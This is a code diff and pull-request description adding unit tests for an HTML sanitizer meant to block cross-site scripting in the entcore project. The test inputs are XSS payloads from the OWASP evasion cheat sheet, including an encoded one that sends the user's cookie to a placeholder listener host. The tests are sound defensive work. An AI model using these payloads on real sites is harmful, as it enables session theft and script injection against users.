+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(VertxUnitRunner.class)
+public class HtmlUtilsTest {
+    private static Logger log = LoggerFactory.getLogger(HtmlUtilsTest.class);
+
+
+    void assertSame(final TestContext context, final String message, final String test) {
+        final String cleaned = HtmlUtils.xssSanitize(test);
+        context.assertEquals(cleaned, test, message);
+    }
+
+    void assertCleaned(final TestContext context, final String message, final String test) {
+        assertCleaned(context, message, test, "");
+    }
+
+    void assertCleaned(final TestContext context, final String message, final String test, final String cleanValue) {
+        final String cleaned = HtmlUtils.xssSanitize(test);
+        context.assertEquals(cleanValue, cleaned, message);
+    }
+
+    @Test
+    public void testXssInjection(final TestContext context) {
+        assertSame(context, "should keep style attribute", "<div style=\"text-align: right;\"><span style=\"line-height: initial;\"></span></div>");
+        assertSame(context, "should keep elements", "<ol><li><h2>Pièces jointes</h2><br /><video></video><audio></audio><article></article><section></section><p></p><b></b><i></i><br /></li></ol>");
+        assertSame(context, "should keep class attributes", "<div class=\"download-attachments\"></div>");
+        assertSame(context, "should keep relative href attributes", "<a href=\"/workspace/document/7690abdf-26a6-475f-970c-3550cf54c607\"></a>");
+        assertSame(context, "should keep absolute href attributes", "<a href=\"https://google.com\"></a>");
+        assertSame(context, "should keep src attributes", "<img alt=\"ok\" src=\"/workspace/document/7690abdf-26a6-475f-970c-3550cf54c607\" />");
+        assertSame(context, "should keep tables", "<table class=\"\" style=\"cursor: nwse-resize;\"><tbody><tr><td><br /></td></tr></tbody></table>");
+        assertSame(context, "should keep mathjax", "<mathjax class=\"ng-isolate-scope\" style=\"cursor: ns-resize;\"><div class=\"MathJax_CHTML_Display\"><span class=\"MathJax_CHTML\" id=\"MathJax-Element-2-Frame\"><span class=\"MJXc-math MJXc-display\" id=\"MJXc-Span-19\"><span class=\"MJXc-mrow\" id=\"MJXc-Span-20\"><span class=\"MJXc-mfrac\" id=\"MJXc-Span-21\" style=\"vertical-align: 0.25em;\"><span class=\"MJXc-box\"></span><span class=\"MJXc-mrow\" id=\"MJXc-Span-22\"><span class=\"MJXc-mo\" id=\"MJXc-Span-23\" style=\"margin-left: 0em; margin-right: 0.111em;\">−</span><span class=\"MJXc-mi MJXc-italic\" id=\"MJXc-Span-24\">b</span><span class=\"MJXc-mo\" id=\"MJXc-Span-25\" style=\"margin-left: 0.267em; margin-right: 0.267em;\">±</span><span class=\"MJXc-msqrt\" id=\"MJXc-Span-26\"><span class=\"MJXc-surd\"><span class=\"MJXc-right MJXc-scale10\" style=\"font-size: 166%; margin-top: 0.084em; margin-left: 0em;\">√</span></span><span class=\"MJXc-root\"><span class=\"MJXc-rule\" style=\"border-top: 0.08em solid;\"></span><span class=\"MJXc-box\"><span class=\"MJXc-msubsup\" id=\"MJXc-Span-27\"><span class=\"MJXc-mi MJXc-italic\" id=\"MJXc-Span-28\" style=\"margin-right: 0.05em;\">b</span><span class=\"MJXc-mn MJXc-script\" id=\"MJXc-Span-29\" style=\"vertical-align: 0.5em;\">2</span></span><span class=\"MJXc-mo\" id=\"MJXc-Span-30\" style=\"margin-left: 0.267em; margin-right: 0.267em;\">−</span><span class=\"MJXc-mn\" id=\"MJXc-Span-31\">4</span><span class=\"MJXc-mi MJXc-italic\" id=\"MJXc-Span-32\">a</span><span class=\"MJXc-mi MJXc-italic\" id=\"MJXc-Span-33\">c</span></span></span></span></span></span><span class=\"MJXc-box\" style=\"margin-top: -0.6em;\"><span class=\"MJXc-denom\"></span><span class=\"MJXc-rule\" style=\"border-top: 1px solid; margin: 0.1em 0px;\"></span><span class=\"MJXc-box\"><span class=\"MJXc-mrow\" id=\"MJXc-Span-34\"><span class=\"MJXc-mn\" id=\"MJXc-Span-35\">2</span><span class=\"MJXc-mi MJXc-italic\" id=\"MJXc-Span-36\">a</span></span></span></span></span></span></span></div>begin{equation}\n{-b \\pm \\sqrt{b^2-4ac} \\over 2a}\n\\end{equation}</mathjax>");
+        //https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
+        assertCleaned(context, "should not keep script element", "<script>alert('XSS')</script>");
+        assertCleaned(context, "should not inject script with open brackets", "<<SCRIPT>alert(\"XSS\");//\\<</SCRIPT>", "&lt;");
+        assertCleaned(context, "should not inject script with no closing tag", "<SCRIPT SRC=http://xss.rocks/xss.js?< B >");
+        assertCleaned(context, "should not keep event attribute", "<div onclick=\"alert('XSS')\"></div>", "<div></div>");
+        assertCleaned(context, "should not keep event with ng attribute", "<div ng-load=\"$eval.constructor('alert(0)')()\" ng-init=\"alert('XSS')\" /></div>", "<div></div>");
+        assertCleaned(context, "should not keep js injection with \\0", "<img src=\"java\\0script:alert('XSS')\" />");
+        assertCleaned(context, "should not keep js injection with meta char", "<img src=\" &#14; javascript:alert('XSS');\" />");
+        assertCleaned(context, "should not keep js injection with non-alpha non-digit", "<div onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")></div>", "<div></div>");
+        assertCleaned(context, "should not inject using img charcode", "<img src=javascript:alert(String.fromCharCode(88,83,83))/>");
+        assertCleaned(context, "should not inject using img onerror", "<img src=/ onerror=\"alert(String.fromCharCode(88,83,83))\"></img>", "<img src=\"/\" />");
+        assertCleaned(context, "should not inject using img onerror encode", "<img src=x onerror=\"&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041\">", "<img src=\"x\" />");
+        assertCleaned(context, "should not inject using img and html caracter", "<img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;/>");
+        assertCleaned(context, "should not inject using img and hex", "<img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29/>");
+        assertCleaned(context, "should not inject using img and base64", "<img onload=\"eval(atob('ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly9saXN0ZXJuSVAvIitkb2N1bWVudC5jb29raWU='))\"/>");
+    }
+
+}

--- a/common/src/test/java/org/entcore/common/utils/HtmlUtilsTest.java
+++ b/common/src/test/java/org/entcore/common/utils/HtmlUtilsTest.java
@@ -43,6 +43,7 @@ public class HtmlUtilsTest {
         assertCleaned(context, "should not inject script with no closing tag", "<SCRIPT SRC=http://xss.rocks/xss.js?< B >");
         assertCleaned(context, "should not keep event attribute", "<div onclick=\"alert('XSS')\"></div>", "<div></div>");
         assertCleaned(context, "should not keep event with ng attribute", "<div ng-load=\"$eval.constructor('alert(0)')()\" ng-init=\"alert('XSS')\" /></div>", "<div></div>");
+        assertCleaned(context, "should not keep js injection with \\0 in href", "<a href=\"java\\0script:alert('XSS')\" ></a>");
         assertCleaned(context, "should not keep js injection with \\0", "<img src=\"java\\0script:alert('XSS')\" />");
         assertCleaned(context, "should not keep js injection with meta char", "<img src=\" &#14; javascript:alert('XSS');\" />");
         assertCleaned(context, "should not keep js injection with non-alpha non-digit", "<div onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")></div>", "<div></div>");

--- a/common/src/test/java/org/entcore/common/utils/SanitizerUtilsTest.java
+++ b/common/src/test/java/org/entcore/common/utils/SanitizerUtilsTest.java
@@ -65,6 +65,7 @@ public class SanitizerUtilsTest {
         // IFRAME
         assertSame(context, "should keep allowed attributes", "<iframe height=\"1\" loading=\"lazy\" name=\"name\" src=\"/iframe.html\"></iframe>");
         assertCleaned(context, "should not keep forbidden attributes", "<iframe allow=\"*\" allowfullscreen=\"true\" allowpaymentrequest=\"true\" credentialless=\"true\" csp=\"default-src\" referrerpolicy=\"no-referrer\" sandbox=\"allow-downloads\" srcdoc=\"<html></html>\"></iframe>", "<iframe></iframe>");
+        assertCleaned(context, "should clean iframe xss injection", "<iframe src=\"data:image/svg+xml;base64,CjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+CiAgPGNpcmNsZSByPSIxMCIgY3g9IjEwIiBjeT0iMTAiIGZpbGw9ImdyZWVuIi8+CiAgPGltYWdlIGhyZWY9IngiIG9uZXJyb3I9ImphdmFzY3JpcHQ6YWxlcnQoJ1hTUycpIiAvPgo8L3N2Zz4=\"></iframe>","<iframe src=\"\"></iframe>");
     }
 
 }

--- a/gradle.properties
+++ b/gradle.properties
@@ -4,7 +4,7 @@ modowner=org.entcore
 modname=ent-core
 
 # Your module version
-version=4.11-SNAPSHOT
+version=4.11-develop-pedago-SNAPSHOT
 
 # The test timeout in seconds
 testtimeout=300

--- a/gradle.properties
+++ b/gradle.properties
@@ -37,7 +37,7 @@ jnaVersion=3.0.2
 lamejbVersion=0.2.0
 reactivePgVersion=0.11.4
 scramClientVersion=2.1
-
+owaspVersion=20220608.1
 runModsArgs=
 scramVersion=2.1
 mongoVersion=3.12.8


### PR DESCRIPTION
# Description

Le but de cette PR est de sanitize des champs HTML de tout type d'injections xxss (base64, text, href, src, event, hexa, html caracter...)

J'ai listé tout les attributs et éléments html autorisés dans le html envoyé (source mozilla)
https://developer.mozilla.org/en-US/docs/Web/HTML/Attributes
https://developer.mozilla.org/en-US/docs/Web/HTML/Elements

## Type of change

Please check options that are relevant.

- [ ] Chore (PATCH)
- [ ] Doc (PATCH)
- [X ] Bug fix (PATCH)
- [ ] New feature (MINOR)

## Which packages changed?

Please check the name of the package you changed

- [ ] admin
- [ ] app-registry
- [ ] archive
- [ ] auth
- [ ] cas
- [ x] common
- [ ] communication
- [ ] conversation
- [ ] directory
- [ ] feeder
- [ ] infra
- [ ] portal
- [ ] session
- [ ] test
- [ ] tests
- [ ] timeline
- [ ] workspace

## Tests

Des tests unitaires permettent de vérifier:
- que les attributs style et classe sont conservés
- les élements de base sont conservés
- les url relative/absolu href sont conservé
- les src attributs sont conservés
- les élements de tables sont conservés
- les élements mathjax sont conservés
- les balises scripts sont supprimés
- les injection de balise scripts sont supprimés
- les attributs appelant du code sont supprimés (onclick...)
- les attributs angularjs sont supprimés (ng-init...)
- les injections d'instructions javascript dans les attributs sont supprimés (avec des non-alpha-non-digit, des caractères null...)
- les injections dans des img avec charcode, onerror, onerror encoded, onerror html char, onerror avec hex, avec base64) sont supprimés 

# Reminder

- Security flaws
- Performance impacts (think bulk !)
- Unit tests were replayed
- Unit tests were added and/or changed
- I have updated the reminder for the version including my modifications

- [ X] All done ! :smiley: